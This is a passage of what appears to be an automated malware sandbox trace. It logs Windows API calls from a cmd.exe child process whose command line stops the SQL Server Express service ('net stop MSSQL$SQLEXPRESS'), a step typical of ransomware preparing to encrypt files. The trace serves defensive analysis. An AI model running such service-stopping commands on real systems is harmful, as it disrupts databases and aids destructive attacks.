(in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c95a0 | out: hHeap=0x3b0000) returned 1 [0072.392] GetEnvironmentStringsW () returned 0x3c40b8* [0072.392] GetProcessHeap () returned 0x3b0000 [0072.392] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb5c) returned 0x3c95a0 [0072.392] FreeEnvironmentStringsW (penv=0x3c40b8) returned 1 [0072.393] GetProcessHeap () returned 0x3b0000 [0072.393] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3bff18 | out: hHeap=0x3b0000) returned 1 [0072.393] DeleteProcThreadAttributeList (in: lpAttributeList=0x37ef84 | out: lpAttributeList=0x37ef84) [0072.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.393] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.393] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.393] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.393] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.393] SetConsoleInputExeNameW () returned 0x1 [0072.393] GetConsoleOutputCP () returned 0x1b5 [0072.394] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.394] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.394] exit (_Code=2) Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x9085000" os_pid = "0x85c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop MSSQL$SQLEXPRESS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0x860 [0069.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x44fecc | out: lpSystemTimeAsFileTime=0x44fecc*(dwLowDateTime=0x98346db0, dwHighDateTime=0x1d57b18)) [0069.396] GetCurrentProcessId () returned 0x85c [0069.396] GetCurrentThreadId () returned 0x860 [0069.396] GetTickCount () returned 0x114b4fe [0069.396] QueryPerformanceCounter (in: lpPerformanceCount=0x44fec4 | out: lpPerformanceCount=0x44fec4*=18961729429) returned 1 [0069.397] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.397] __set_app_type (_Type=0x1) [0069.397] __p__fmode () returned 0x74eb31f4 [0069.397] __p__commode () returned 0x74eb31fc [0069.397] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.397] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.397] GetCurrentThreadId () returned 0x860 [0069.397] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x860) returned 0x60 [0069.397] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.398] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.398] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.398] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x44fe5c | out: phkResult=0x44fe5c*=0x0) returned 0x2 [0069.398] VirtualQuery (in: lpAddress=0x44fe93, lpBuffer=0x44fe2c, dwLength=0x1c | out: lpBuffer=0x44fe2c*(BaseAddress=0x44f000, AllocationBase=0x350000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.398] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x44fe2c, dwLength=0x1c | out: lpBuffer=0x44fe2c*(BaseAddress=0x350000, AllocationBase=0x350000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.398] VirtualQuery (in: lpAddress=0x351000, lpBuffer=0x44fe2c, dwLength=0x1c | out: lpBuffer=0x44fe2c*(BaseAddress=0x351000, AllocationBase=0x350000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.398] VirtualQuery (in: lpAddress=0x353000, lpBuffer=0x44fe2c, dwLength=0x1c | out: lpBuffer=0x44fe2c*(BaseAddress=0x353000, AllocationBase=0x350000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.398] VirtualQuery (in: lpAddress=0x450000, lpBuffer=0x44fe2c, dwLength=0x1c | out: lpBuffer=0x44fe2c*(BaseAddress=0x450000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0069.398] GetConsoleOutputCP () returned 0x1b5 [0069.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.398] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.399] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.399] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.399] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.400] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.400] GetEnvironmentStringsW () returned 0x6c2040* [0069.400] GetProcessHeap () returned 0x6b0000 [0069.400] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xaca) returned 0x6c2b18 [0069.400] FreeEnvironmentStringsW (penv=0x6c2040) returned 1 [0069.400] GetProcessHeap () returned 0x6b0000 [0069.400] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4) returned 0x6c0c78 [0069.400] GetEnvironmentStringsW () returned 0x6c2040* [0069.400] GetProcessHeap () returned 0x6b0000 [0069.400] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xaca) returned 0x6c35f0 [0069.401] FreeEnvironmentStringsW (penv=0x6c2040) returned 1 [0069.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x44edcc | out: phkResult=0x44edcc*=0x68) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x0, lpData=0x44edd8*=0x0, lpcbData=0x44edd0*=0x1000) returned 0x2 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x1, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x0, lpData=0x44edd8*=0x1, lpcbData=0x44edd0*=0x1000) returned 0x2 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x0, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x40, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x40, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x0, lpData=0x44edd8*=0x40, lpcbData=0x44edd0*=0x1000) returned 0x2 [0069.401] RegCloseKey (hKey=0x68) returned 0x0 [0069.401] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x44edcc | out: phkResult=0x44edcc*=0x68) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x0, lpData=0x44edd8*=0x40, lpcbData=0x44edd0*=0x1000) returned 0x2 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x1, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x0, lpData=0x44edd8*=0x1, lpcbData=0x44edd0*=0x1000) returned 0x2 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x0, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x9, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.401] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x4, lpData=0x44edd8*=0x9, lpcbData=0x44edd0*=0x4) returned 0x0 [0069.402] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x44edd4, lpData=0x44edd8, lpcbData=0x44edd0*=0x1000 | out: lpType=0x44edd4*=0x0, lpData=0x44edd8*=0x9, lpcbData=0x44edd0*=0x1000) returned 0x2 [0069.402] RegCloseKey (hKey=0x68) returned 0x0 [0069.402] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb4 [0069.402] srand (_Seed=0x5d97ebb4) [0069.402] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop MSSQL$SQLEXPRESS" [0069.402] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop MSSQL$SQLEXPRESS" [0069.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.402] GetProcessHeap () returned 0x6b0000 [0069.402] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6c2040 [0069.402] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6c2048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.402] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.402] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.402] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.402] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.402] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.402] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.403] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.403] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.403] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.403] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.403] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.403] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.403] GetProcessHeap () returned 0x6b0000 [0069.403] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c2b18 | out: hHeap=0x6b0000) returned 1 [0069.403] GetEnvironmentStringsW () returned 0x6c2258* [0069.403] GetProcessHeap () returned 0x6b0000 [0069.403] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xae2) returned 0x6c4bb8 [0069.403] FreeEnvironmentStringsW (penv=0x6c2258) returned 1 [0069.403] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.403] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.403] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.403] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.403] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.403] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.403] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.403] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.403] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.403] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.403] GetProcessHeap () returned 0x6b0000 [0069.403] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x54) returned 0x6c56a8 [0069.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x44fb98 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.403] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x44fb98, lpFilePart=0x44fb94 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x44fb94*="Desktop") returned 0x25 [0069.403] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.404] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x44f914 | out: lpFindFileData=0x44f914*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6c1ec0 [0069.404] FindClose (in: hFindFile=0x6c1ec0 | out: hFindFile=0x6c1ec0) returned 1 [0069.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x44f914 | out: lpFindFileData=0x44f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6c1ec0 [0069.404] FindClose (in: hFindFile=0x6c1ec0 | out: hFindFile=0x6c1ec0) returned 1 [0069.404] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x44f914 | out: lpFindFileData=0x44f914*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6c1ec0 [0069.404] FindClose (in: hFindFile=0x6c1ec0 | out: hFindFile=0x6c1ec0) returned 1 [0069.404] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.404] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.404] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.404] GetProcessHeap () returned 0x6b0000 [0069.404] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4bb8 | out: hHeap=0x6b0000) returned 1 [0069.404] GetEnvironmentStringsW () returned 0x6c40c8* [0069.404] GetProcessHeap () returned 0x6b0000 [0069.404] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb36) returned 0x6c5f08 [0069.405] FreeEnvironmentStringsW (penv=0x6c40c8) returned 1 [0069.405] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.405] GetProcessHeap () returned 0x6b0000 [0069.405] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c56a8 | out: hHeap=0x6b0000) returned 1 [0069.405] GetProcessHeap () returned 0x6b0000 [0069.405] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400e) returned 0x6c6a48 [0069.405] GetProcessHeap () returned 0x6b0000 [0069.405] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x40) returned 0x6c1ec0 [0069.405] GetProcessHeap () returned 0x6b0000 [0069.405] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c6a48 | out: hHeap=0x6b0000) returned 1 [0069.405] GetConsoleOutputCP () returned 0x1b5 [0069.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x44fcd8, cchData=128 | out: lpLCData="0") returned 2 [0069.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x44fcd8, cchData=128 | out: lpLCData="0") returned 2 [0069.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x44fcd8, cchData=128 | out: lpLCData="1") returned 2 [0069.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.407] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.408] GetProcessHeap () returned 0x6b0000 [0069.408] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20c) returned 0x6c2dd0 [0069.408] GetConsoleTitleW (in: lpConsoleTitle=0x6c2dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.408] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.408] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.408] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.408] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.409] GetProcessHeap () returned 0x6b0000 [0069.409] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400a) returned 0x6c6a48 [0069.409] GetProcessHeap () returned 0x6b0000 [0069.409] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c6a48 | out: hHeap=0x6b0000) returned 1 [0069.409] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.409] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.409] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.409] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.409] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.409] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.409] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.409] GetProcessHeap () returned 0x6b0000 [0069.409] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6c2fe8 [0069.409] GetProcessHeap () returned 0x6b0000 [0069.409] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x10) returned 0x6bff18 [0069.410] GetProcessHeap () returned 0x6b0000 [0069.410] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x36) returned 0x6c3048 [0069.410] GetConsoleTitleW (in: lpConsoleTitle=0x44f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.411] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.411] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.411] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.411] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.411] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.411] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.411] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.411] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.411] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.411] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.411] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.411] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.411] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.411] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.411] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.411] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.411] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.411] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.411] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.411] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.411] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.411] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.411] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.411] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.411] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.411] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.411] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.411] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.411] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.412] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.412] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.412] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.412] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.412] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.412] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.412] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.412] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.412] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.412] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.412] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.412] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.412] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.412] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.412] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.412] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.412] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.412] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.412] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.412] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.412] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.412] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.412] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.412] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.412] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.412] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.412] _wcsicmp (_String1="net", _String2="TIME") returned 